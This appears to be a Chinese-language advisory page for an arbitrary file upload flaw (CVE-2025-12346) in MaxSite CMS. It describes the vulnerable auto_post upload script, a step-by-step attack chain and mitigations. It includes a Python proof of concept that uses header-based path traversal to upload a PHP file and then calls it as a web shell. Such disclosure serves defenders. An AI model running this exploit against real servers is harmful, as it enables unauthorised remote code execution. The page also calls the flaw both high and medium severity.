CVE-2025-12346 CVSS 6.3 中危

MaxSite CMS CVE-2025-12346 任意文件上传漏洞

披露日期: 2025-10-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-12346

漏洞类型

任意文件上传

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MaxSite CMS

漏洞概述

CVE-2025-12346是MaxSite CMS中存在的一个高危安全漏洞，攻击者可通过操纵HTTP请求头中的X-Requested-FileName和X-Requested-FileUpDir参数实现任意文件上传。该漏洞影响MaxSite CMS 109及以下所有版本，存在于管理插件auto_post的文件上传组件uploads-require-maxsite.php中。由于该文件缺乏对上传文件的充分验证和过滤，远程攻击者可以在无需高权限的情况下通过发送精心构造的HTTP请求，上传恶意文件（如WebShell）到服务器，从而实现远程代码执行。漏洞已被公开披露，厂商尚未做出响应修复。

技术细节

该漏洞位于MaxSite CMS的application/maxsite/admin/plugins/auto_post/uploads-require-maxsite.php文件中的HTTP Header Handler组件。漏洞根源在于程序直接接收并使用HTTP请求头中的X-Requested-FileName和X-Requested-FileUpDir参数来控制文件上传路径和文件名，而未对这些参数进行充分的输入验证和安全过滤。攻击者可通过发送包含恶意文件名的HTTP请求头，绕过客户端的文件类型限制，上传.php、.phtml等可执行脚本文件。一旦恶意文件成功上传到Web根目录，攻击者即可通过HTTP请求访问该文件，在服务器上执行任意代码，实现远程控制。CVSS 3.1评分6.3（Medium），攻击向量为网络，所需权限低，无需用户交互。

攻击链分析

STEP 1

步骤1

攻击者识别目标站点使用的MaxSite CMS版本，确认版本号不超过109

STEP 2

步骤2

构造包含恶意PHP代码的文件上传请求，添加X-Requested-FileName和X-Requested-FileUpDir请求头

STEP 3

步骤3

发送精心构造的HTTP POST请求到uploads-require-maxsite.php端点

STEP 4

步骤4

利用路径遍历字符../../../../将恶意文件上传到Web可访问目录

STEP 5

步骤5

通过HTTP请求访问上传的WebShell，执行任意系统命令

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target.com/maxsite/admin/plugins/auto_post/uploads-require-maxsite.php"

# Malicious PHP payload
php_payload = "<?php phpinfo(); ?>"

headers = {
    "X-Requested-FileName": "evil.php",
    "X-Requested-FileUpDir": "../../../../",
    "Content-Type": "multipart/form-data"
}

files = {
    "file": ("evil.php", php_payload, "application/x-php")
}

response = requests.post(target_url, headers=headers, files=files)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

# Access uploaded shell
shell_url = "http://target.com/maxsite/evil.php"
shell_response = requests.get(shell_url)
print(f"Shell access: {shell_response.status_code}")

影响范围

MaxSite CMS <= 109

防御指南

临时缓解措施

在厂商发布正式补丁前，可通过以下措施临时缓解：1) 限制管理后台访问IP；2) 禁用或删除auto_post插件；3) 配置Web服务器阻止访问上传目录中的可执行文件；4) 部署WAF规则拦截包含X-Requested-FileName和X-Requested-FileUpDir的异常请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12346
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12346
3 Details https://www.cvedetails.com/cve/CVE-2025-12346/
4 VulDB https://vuldb.com/cve/CVE-2025-12346
5 Link https://note-hxlab.wetolink.com/share/8QmDZCddHvyR
6 Link https://vuldb.com/?ctiid.330136
7 Link https://vuldb.com/?id.330136
8 Link https://vuldb.com/?submit.674551

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表